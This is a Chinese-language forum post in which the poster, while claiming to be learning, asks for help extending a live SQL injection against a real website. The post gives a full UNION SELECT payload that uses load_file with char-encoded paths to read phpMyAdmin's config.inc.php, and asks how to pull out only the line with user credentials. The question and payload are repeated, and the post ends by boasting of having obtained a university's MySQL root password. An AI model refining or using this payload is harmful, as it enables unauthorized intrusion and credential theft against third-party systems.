先声明,不是为了搞破坏,就是多学学安全知识。
网站系统是linux+apache+php+mysql。
现在已经用loadfile(/)一步步进到了phpadmin里,可显示config.inc.php的时候,网页的表段显示不完,只能看到头几行,找网站别的注入点,也是显示不全。请问,能不能再在下面的代码下加点控制语句,让它一次只显示一行。或者,,直接显示有user的那行。。
代码如下:
http://www.xxxx.com/Business/BusinessShow_detail.php?resid=21265731/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,replace(load_file(char(47,117,115,114,47,115,101,114,118,101,114,47,112,104,112,97,100,109,105,110,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),char(60),char(32)),18,19,20,21,22,23,24,25,26,27,28,29/*
网站系统是linux+apache+php+mysql。
现在已经用loadfile(/)一步步进到了phpadmin里,可显示config.inc.php的时候,网页的表段显示不完,只能看到头几行,找网站别的注入点,也是显示不全。请问,能不能再在下面的代码下加点控制语句,让它一次只显示一行。或者,,直接显示有user的那行。。
代码如下:
http://www.xxxx.com/Business/BusinessShow_detail.php?resid=21265731/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,replace(load_file(char(47,117,115,114,47,115,101,114,118,101,114,47,112,104,112,97,100,109,105,110,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),char(60),char(32)),18,19,20,21,22,23,24,25,26,27,28,29/*
从备注栏上显示如下信息:?php /* $Id: config.inc.php,v 2.48 时间 nijel Exp $ */ // vim: expandtab sw=4 ts=4 sts=4: /** * phpMyAdmin Configuration File * * All directives are explained in Documentation.html不过,注入的参数有很多种。
有所大学的,连config.inc.php 都可以看到
mysql的 root密码都知道了
唉